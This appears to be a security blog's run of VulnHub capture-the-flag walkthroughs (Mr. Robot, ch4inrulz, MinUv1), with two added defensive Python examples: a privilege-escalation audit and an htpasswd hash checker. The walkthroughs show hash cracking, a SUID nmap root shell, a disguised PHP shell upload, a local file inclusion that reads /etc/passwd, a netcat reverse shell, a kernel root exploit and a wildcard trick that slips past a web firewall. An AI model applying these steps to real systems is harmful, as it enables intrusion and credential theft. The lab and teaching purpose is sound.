-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$

This is an MD5 hash, which we cracked online using CrackStation.

If we try to su to the user robot with the cracked password we get a successful login.

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:~$ pwd
pwd
/home/robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ 

We got the second key; now it's time to escalate our privileges to root. We start by looking at the SUID files on the system.

robot@linux:~$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$

We see that /usr/local/bin/nmap is SUID and we know we can break out to a root shell with it in interactive mode.

robot@linux:~$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# whoami
whoami
root
# cd /root
cd /root
# ls -la
ls -la
total 32
drwx------  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
-rw-------  1 root root 4058 Nov 14  2015 .bash_history
-rw-r--r--  1 root root 3274 Sep 16  2015 .bashrc
drwx------  2 root root 4096 Nov 13  2015 .cache
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root 1024 Sep 16  2015 .rnd
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
# 

As you can see we found the third and final key in the VM and got root.
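Each of the three escalations in these posts (the NOPASSWD sudo rule for git on DC-2, the setuid statuscheck that runs curl through PATH on Symfonos 1, and the setuid nmap on Mr. Robot) is something a host audit can find before an attacker does. The following is an added example, not code from any of the walkthroughs, that implements such an audit in Python; the shell-escape list is a small illustrative subset of GTFOBins, and the sample binary blob and sudo -l text are constructed stand-ins.

```python
"""Audit for the three footholds used in the DC-2, Symfonos 1 and Mr. Robot posts:
a NOPASSWD sudo rule for a program that can spawn a shell (git), a setuid binary
that is itself a known shell escape (nmap), and a setuid binary that runs a bare
command name through system() (statuscheck). Added example; samples are constructed."""
import os
import re

# Programs with documented shell escapes: a small illustrative subset of the
# GTFOBins list the DC-2 post links to, not the complete list.
SHELL_ESCAPES = {"git", "nmap", "vim", "vi", "less", "more", "find", "awk", "python", "perl"}
# libc entry points that hand a command line to /bin/sh; a bare program name in
# that command line is resolved through the caller's PATH, which is the flaw.
SHELL_SPAWNERS = {"system", "popen", "execvp", "execlp", "execvpe"}
# A command string beginning with a bare program name rather than /path/to/it.
RELATIVE_CMD = re.compile(r"^[A-Za-z][\w.+-]*(?:\s+\S+)+$")
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def extract_strings(data, min_len=4):
    """Like `strings -n 4`: runs of printable ASCII ended by NUL or a non-printable byte."""
    out, run = [], bytearray()
    for b in data + b"\0":
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out


def path_injection_evidence(data):
    """The /opt/statuscheck pattern: a shell-spawning import next to a command
    string that is not an absolute path. Optimised builds can split such a string
    into 8-byte immediates (the post's strings output shows 'curl -I H', 'http://lH',
    'ocalhostH'), so no match is not a clean bill of health."""
    found = extract_strings(data)
    spawners = sorted(s for s in found if s in SHELL_SPAWNERS)
    cmds = [s for s in found if RELATIVE_CMD.match(s) and (" -" in s or "/" in s)]
    return {"spawners": spawners, "relative_commands": cmds,
            "risky": bool(spawners) and bool(cmds)}


def audit_suid(paths):
    """[(path, [reasons])] for the setuid binaries (e.g. the output of
    find / -xdev -perm -4000 -type f) that are known escapes or show the pattern."""
    findings = []
    for path in paths:
        reasons = []
        if os.path.basename(path) in SHELL_ESCAPES:
            reasons.append("known shell escape")
        try:
            with open(path, "rb") as f:
                ev = path_injection_evidence(f.read())
        except OSError:
            ev = {"risky": False, "relative_commands": []}
        if ev["risky"]:
            reasons.append("system() with bare command: " + "; ".join(ev["relative_commands"]))
        if reasons:
            findings.append((path, reasons))
    return findings


def risky_sudo_rules(sudo_l_output):
    """(runas, command) for NOPASSWD rules in `sudo -l` output whose program is a
    known shell escape, or which allow ALL."""
    risky = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m or "NOPASSWD" not in m.group("tags"):
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd == "ALL" or os.path.basename(cmd.split()[0]) in SHELL_ESCAPES:
                risky.append((m.group("runas"), cmd))
    return risky


# --- constructed samples: the DC-2 sudo -l text and a stand-in for statuscheck ---
SAMPLE_SUDO_L = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""
VULN_BLOB = (b"\x7fELF\x02\x01\x01" + b"\0" * 9 + b"system\0__libc_start_main\0"
             b"curl -I http://localhost\0GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516\0")
FIXED_BLOB = VULN_BLOB.replace(b"curl -I", b"/usr/bin/curl -I")

if __name__ == "__main__":
    import sys
    # Usage: find / -xdev -perm -4000 -type f 2>/dev/null | python3 audit.py
    for path, reasons in audit_suid(line.strip() for line in sys.stdin if line.strip()):
        print(path, "->", "; ".join(reasons))
    print("risky sudo rules:", risky_sudo_rules(SAMPLE_SUDO_L))
```

FIXED_BLOB is the same stand-in with the command anchored to /usr/bin/curl, which is the one-line fix for statuscheck (along with not making it setuid at all, since checking localhost needs no privilege).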

Monday, October 21, 2019

VulnHub: ch4inrulz Walkthrough


First we start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sV -sC -O -Pn -T5 192.168.56.106

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-21 11:24 MDT
Nmap scan report for 192.168.56.106
Host is up (0.00042s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
|   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: FRANK's Website | Under development
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:0B:EB:F1 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.19 - 2.6.36
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.13 seconds
root@ubuntu:~# 

Nmap came back with ports 21, 22, 80 and 8011 open. Let's start with port 21. If we connect to the FTP server we see it allows anonymous logins.

root@ubuntu:~# ftp 192.168.56.106
Connected to 192.168.56.106.
220 (vsFTPd 2.3.5)
Name (192.168.56.106:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> exit
221 Goodbye.
root@ubuntu:~# 

The anonymous FTP directory is empty, so let's move on to port 80 and see what it has to offer. We start by running nikto against the remote host.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.106
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.106
+ Target Hostname:    192.168.56.106
+ Target Port:        80
+ Start Time:         2019-10-21 11:26:01 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 07:39:32 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting.
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2019-10-21 11:26:16 (GMT-6) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto reports that Apache's mod_negotiation is enabled with MultiViews (the 'tcn: list' header is the tell-tale), which lets an attacker brute force alternative file names for a resource. It already gives us two alternatives for 'index': index.html and index.html.bak. Let's view the site and see what it looks like.

It looks like a blog of some sort. If we try to view index.html.bak we are prompted to download it, so we download it and find this in the source:

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>

This is an htpasswd entry for a protected directory on the server: the $apr1$ prefix is Apache's MD5-based htpasswd format, with the salt 1oIGDEDK between the second and third dollar signs. Let's fire up John the Ripper and crack the hash. After a while it cracks and the password is 'frank!!!'. Now let's log in to the development directory as frank.
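
To check a cracked password against an $apr1$ entry without a third-party tool, here is an added Python implementation of Apache's apr1 MD5 scheme (this is example code added here, not from the original walkthrough or from Apache; the htpasswd line and the password are the ones above, the function names are my own):

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# The line recovered from index.html.bak above.
HTPASSWD_LINE = "frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0"


def _to64(value: int, count: int) -> str:
    """Apache's to64(): emit `count` characters, six bits at a time, low bits first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: str, salt: str, magic: str = "$apr1$") -> str:
    """Compute an Apache htpasswd MD5 hash of the form $apr1$salt$hash.

    This is the classic md5crypt construction with a different magic string:
    an initial digest that mixes in a password/salt/password digest, then
    1000 rounds alternating password and intermediate digest, then a custom
    base64 encoding with the digest bytes reordered.
    """
    pw = password.encode()
    sl = salt.encode()

    ctx = hashlib.md5(pw + magic.encode() + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    pl = len(pw)
    while pl > 0:                       # feed len(pw) bytes of alt, 16 at a time
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                            # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):               # the deliberately slow part
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sl)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()

    encoded = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return f"{magic}{salt}${encoded}"


def verify_htpasswd(password: str, entry: str) -> bool:
    """Check a candidate password against a 'user:$apr1$salt$hash' line."""
    hashed = entry.split(":", 1)[1] if ":" in entry else entry
    parts = hashed.split("$")           # ['', 'apr1', salt, hash]
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ entry")
    candidate = apr1_md5(password, parts[2], "$apr1$")
    return hmac.compare_digest(candidate, hashed)


if __name__ == "__main__":
    for guess in ("password", "frank", "frank!!!"):
        print(f"{guess!r}: {verify_htpasswd(guess, HTPASSWD_LINE)}")
```

The same routine is what hashcat mode 1600 and John's md5crypt format grind through; 1000 MD5 rounds is cheap on a GPU, which is why an eight-character password from a common pattern falls quickly.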

The page lists the tools on the server, one of which is called the 'uploader'. If we fuzz directory names under /development we find the directory holding the upload script.

If we try to upload a simple text file we get the following error.

File is not an image.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

So we need an image file. Let's try prepending the GIF signature 'GIF89a;' to our PHP shell and uploading that. The file is still rejected, so the script checks the file extension as well as the content, which means we need to upload it with a .gif extension.

File is an image - image/gif.The file sh.gif has been uploaded to my uploads path.

So we successfully uploaded a file, but we don't know where the uploads path is. After running some directory discovery scripts without finding it I decided to move on and run dirb against the remote host to see what directories it finds.

---- Scanning URL: http://192.168.56.106/ ----
+ http://192.168.56.106/cgi-bin/ (CODE:403|SIZE 290)                                                                                                               
==> DIRECTORY: http://192.168.56.106/css/                                                                                                                                       
+ http://192.168.56.106/development (CODE:401|SIZE:481)                                                                                                                         
==> DIRECTORY: http://192.168.56.106/img/                                                                                                                                       
+ http://192.168.56.106/index (CODE:200|SIZE:334)                                                                                                                               
+ http://192.168.56.106/index.html (CODE:200|SIZE:13516)                                                                                                                        
==> DIRECTORY: http://192.168.56.106/js/                                                                                                                                        
+ http://192.168.56.106/LICENSE (CODE:200|SIZE:1093)                                                                                                                            
+ http://192.168.56.106/robots (CODE:200|SIZE:21)                                                                                                                               
+ http://192.168.56.106/robots.txt (CODE:200|SIZE:21)                                                                                                                           
+ http://192.168.56.106/server-status (CODE:403|SIZE:295)                                                                                                                       
==> DIRECTORY: http://192.168.56.106/vendor/ 

dirb didn't come back with anything interesting, so let's move on to wfuzz and see if it finds anything worthwhile. I ran wfuzz but didn't find anything interesting either, so let's move on to port 8011. We start again by running nikto against the remote host.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.106:8011
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.106
+ Target Hostname:    192.168.56.106
+ Target Port:        8011
+ Start Time:         2019-10-21 12:00:47 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1052109, size: 30, mtime: Sat Apr 14 06:00:08 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7948 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2019-10-21 12:01:00 (GMT-6) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto didn't come back with anything interesting. Now let's try dirb and see what it finds.

==> DIRECTORY: http://192.168.56.106:8011/api/    

Dirb found a directory called api, which looks promising. Let's navigate to it and see what it says.

Out of the four files listed, only one (files_api.php) is present on the server. If we navigate to the file we see this:

It says "No parameter called file passed to me", so let's try passing the file parameter to the script and see what happens.

Passing it as a GET parameter gets us 'HACKER DETECTED'. After playing around with this for a while I came to the conclusion that the script wants the parameter in a POST request instead of a GET request. We can do that with curl:

root@ubuntu:~# curl -X POST -d "file=/etc/passwd" http://192.168.56.106:8011/api/files_api.php

root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false

root@ubuntu:~# 

From /etc/passwd we see that there is one regular user on the system (frank) and nothing else too interesting. One thing you can do with an LFI in PHP is use the php://filter stream wrapper with convert.base64-encode: the file is base64-encoded before include() sees it, so its PHP source comes back as text instead of being executed. If we include the script itself this way and base64-decode the response we see this:

curl -X POST -d "file=php://filter/convert.base64-encode/resource=files_api.php" http://192.168.56.106:8011/api/files_api.php
$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];

if(isset($get_file)){
    echo "********* HACKER DETECTED *********";
    echo "YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
    echo "WRONG INPUT !!";
    break;
}

if(!isset($file)){
    echo "No parameter called file passed to me";
    echo "* Note : this API don't use json , so send the file name in raw format";
}

/** else{ echo strcmp($file,"/etc/passwd"); echo strlen($file); echo strlen("/etc/passwd"); if($file == "/etc/passwd"){ "HACKER DETECTED .."; } }**/

The script is a classic local file inclusion: whatever is POSTed as 'file' goes straight into include(). If you remember, we uploaded a shell to the server but didn't know the upload directory. We can read the uploader's own source with the same filter trick to find out where it stores files, and then include our shell, which executes it as the web server user:

curl -X POST -d "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" http://192.168.56.106:8011/api/files_api.php

$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

That gives us the upload directory, FRANKuploads/ next to the upload script. Let's visit it and see if directory listing is enabled.

We see the shell we uploaded. Our next task is to start a netcat listener on our Kali box and then include the shell through the LFI in files_api.php.

root@kali:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.106: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.106] 55539
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
 08:02:47 up  3:39,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ 

We dropped to a system shell as www-data. Now it's time to search around the box and see what we can find.

$ cd /home
$ ls
frank
$ cd frank
$ ls -la
total 36
drwxr-xr-x 3 frank frank 4096 Apr 14  2018 .
drwxr-xr-x 3 root  root  4096 Apr 13  2018 ..
-rw------- 1 frank frank   26 Jul 31  2018 .bash_history
-rw-r--r-- 1 frank frank  220 Apr 13  2018 .bash_logout
-rw-r--r-- 1 frank frank 3353 Apr 13  2018 .bashrc
drwxr-xr-x 2 frank frank 4096 Apr 13  2018 .cache
-rw-r--r-- 1 frank frank  675 Apr 13  2018 .profile
-rw-r--r-- 1 frank frank    0 Apr 13  2018 .sudo_as_admin_successful
-rw-r--r-- 1 frank frank   29 Apr 14  2018 PE.txt
-rw-r--r-- 1 frank frank   33 Apr 14  2018 user.txt
$ 

We find two interesting files in frank's home directory but nothing else.

www-data@ubuntu:/home/frank$ cat user.txt
cat user.txt
4795aa2a9be22fac10e1c25794e75c1b
www-data@ubuntu:/home/frank$ cat PE.txt
cat PE.txt
Try it as fast as you can ;)
www-data@ubuntu:/home/frank$ 

After some research it turns out that this kernel (2.6.35) is vulnerable to a local root exploit, which is in searchsploit as 15023 (the RDS socket privilege escalation, CVE-2010-3904). I compile the exploit on my Kali box and wget it over to the target.

www-data@ubuntu:/tmp$ ./15023
./15023
resolved symbol commit_creds to 0xffffffff810852b0
resolved symbol prepare_kernel_cred to 0xffffffff81085780
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
#
# cd /root
cd /root
# ls -la
ls -la
total 32
drwx------  4 root root 4096 Apr 14  2018 .
drwxr-xr-x 22 root root 4096 Apr 13  2018 ..
drwx------  2 root root 4096 Apr 13  2018 .aptitude
-rw-------  1 root root   82 Jul 31  2018 .bash_history
-rw-r--r--  1 root root 3106 Apr 23  2010 .bashrc
drwxr-xr-x  2 root root 4096 Apr 14  2018 .cache
-rw-r--r--  1 root root  140 Apr 23  2010 .profile
-rw-r--r--  1 root root   33 Apr 14  2018 root.txt
# cat root.txt
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
# 
That was a fun VM to go through.

Saturday, October 19, 2019

VulnHub: MinUv1 Walkthrough

Lets first start of with an nmap scan against the remote host.

root@ubuntu:~/pentest# nmap -sV -sC -O -Pn -p- -T5 192.168.56.105

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-16 15:57 MDT
Warning: 192.168.56.105 giving up on port because retransmission cap hit (2).
Stats: 0:02:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 16:00 (0:00:00 remaining)
Nmap scan report for 192.168.56.105
Host is up (0.00063s latency).
Not shown: 65529 closed ports
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.27
|_http-server-header: Apache/2.4.27 (Ubuntu)
|_http-title: 403 Forbidden
MAC Address: 08:00:27:6A:86:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Host: 127.0.1.1

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.38 seconds
root@ubuntu:~/pentest# 

Nmap came back with only port 80 open. If we visit the website we see this:

Our next task is to hit it with nikto to see if it finds anything interesting.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.105
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Start Time:         2019-10-16 16:02:24 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Ubuntu)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.27 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 56a9aee1bb80f, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ 7947 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2019-10-16 16:03:39 (GMT-6) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto didn't come back with anything of interest. Let's try dirb and see what it finds.

+ http://192.168.56.105/.config (CODE:403|SIZE:296)                                                                                                                                                                               
+ http://192.168.56.105/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:316)                                                                                                                                                           
+ http://192.168.56.105/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:317)                                                                                                                                                          
+ http://192.168.56.105/_vti_bin/shtml.dll (CODE:403|SIZE:307)                                                                                                                                                                    
+ http://192.168.56.105/awstats.conf (CODE:403|SIZE:301)                                                                                                                                                                          
+ http://192.168.56.105/development.log (CODE:403|SIZE:304)                                                                                                                                                                       
+ http://192.168.56.105/global.asa (CODE:403|SIZE:299)                                                                                                                                                                            
+ http://192.168.56.105/global.asax (CODE:403|SIZE:300)                                                                                                                                                                           
+ http://192.168.56.105/index.html (CODE:200|SIZE:10918)                                                                                                                                                                          
+ http://192.168.56.105/main.mdb (CODE:403|SIZE:297)                                                                                                                                                                              
+ http://192.168.56.105/php.ini (CODE:403|SIZE:296)                                                                                                                                                                               
+ http://192.168.56.105/production.log (CODE:403|SIZE:303)                                                                                                                                                                        
+ http://192.168.56.105/readfile (CODE:403|SIZE:416)                                                                                                                                                                              
+ http://192.168.56.105/server-status (CODE:403|SIZE:302)                                                                                                                                                                         
+ http://192.168.56.105/spamlog.log (CODE:403|SIZE:300)                                                                                                                                                                           
+ http://192.168.56.105/thumbs.db (CODE:403|SIZE:298)                                                                                                                                                                             
+ http://192.168.56.105/Thumbs.db (CODE:403|SIZE:298)                                                                                                                                                                             
+ http://192.168.56.105/WS_FTP.LOG (CODE:403|SIZE:299) 

Everything it found is 403 Forbidden, and most of these names are IIS/FrontPage files that would not exist on an Apache host, which suggests something in front of the site is answering for them. Let's run wafw00f against the host and see what it says. Wafw00f comes back positive: the site is behind a web application firewall, and it identifies it as ModSecurity. I decide to try wfuzz against it, looking for common file names and extensions while hiding 403 and 404 responses.

sam@ubuntu:~/src/wfuzz$ ./wfuzz -w /wordlist/general/big.txt -w /wordlist/general/extensions_common.txt --hc '403,404' -t 50 http://192.168.56.105/FUZZFUZ2Z

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://192.168.56.105/FUZZFUZ2Z
Total requests: 84672

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                                           
===================================================================

000037784:   200        375 L    964 W    10918 Ch    "index - .html"                                                                                                                                                   
000076207:   200        40 L     159 W     1986 Ch    "test - .php"                                                                                                                                                   
sam@ubuntu:~/src/wfuzz$

Wfuzz came back with two files, index.html and test.php. Let's navigate to test.php and see what it is.

It looks like a browser identification page. If we view the source we find something interesting:

href='test.php?file=last.html

The file parameter in test.php could be an LFI or RFI. If we try to include /etc/passwd we get a 403 Forbidden, because the ModSecurity rules block the literal string. So I had to google how to bypass ModSecurity: replacing characters of the path with the shell wildcard '?' keeps '/etc/passwd' out of the request, and the shell on the other side expands the pattern back to the same file (which, as we find out below, is exactly what the parameter is fed to).

http://192.168.56.105/test.php?file=/e?c/?asswd

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
